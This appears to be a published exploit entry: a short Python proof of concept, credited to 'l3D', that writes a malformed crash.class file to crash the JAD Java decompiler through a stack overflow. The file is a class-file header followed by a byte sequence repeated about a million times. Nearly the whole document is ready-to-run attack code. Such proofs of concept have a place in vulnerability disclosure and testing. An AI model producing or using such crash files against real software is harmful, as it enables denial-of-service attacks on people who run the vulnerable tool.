JAD java decompiler .class file stack overflow denial of service exploit.
43c0f91c427b5a9f5a07b7825d8b19e9eaccf62927acb3b12f5f63350622529a
#!/usr/bin/env python
#JAD java decompiler (.class) Stack Overflow DoS
#Link: http://www.varaneckas.com/jad
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
header='\xca\xfe\xba\xbe\x01\x04\x01\x04\xff\xff'
evil='\x07\x01\x01'*0x100000
bad=open('crash.class', 'w')
bad.write(header+evil)
bad.close()